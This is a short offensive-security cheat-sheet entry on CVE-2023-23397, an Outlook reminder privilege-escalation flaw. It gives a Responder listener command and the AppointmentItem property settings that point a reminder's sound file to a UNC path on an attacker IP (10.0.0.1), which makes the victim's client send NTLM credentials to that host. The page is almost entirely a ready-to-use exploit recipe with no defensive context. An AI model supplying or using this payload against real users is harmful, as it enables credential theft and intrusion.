Outlook Reminder Privilege Escalation
The Outlook’s Reminder method is vulnerable to privilege escalation by abusing the UNC (Universal Naming Convention) file path of the reminder sound. CVE-2023-23397.
# -I: Interface (eth0, tun0, etc.)
responder -I tun0
Copied!AppointmentItem.ReminderOverrideDefault = true AppointmentItem.ReminderPlaySound = true AppointmentItem.ReminderSoundFile ="\\10.0.0.1\test.wav" Copied!
References
Last updated
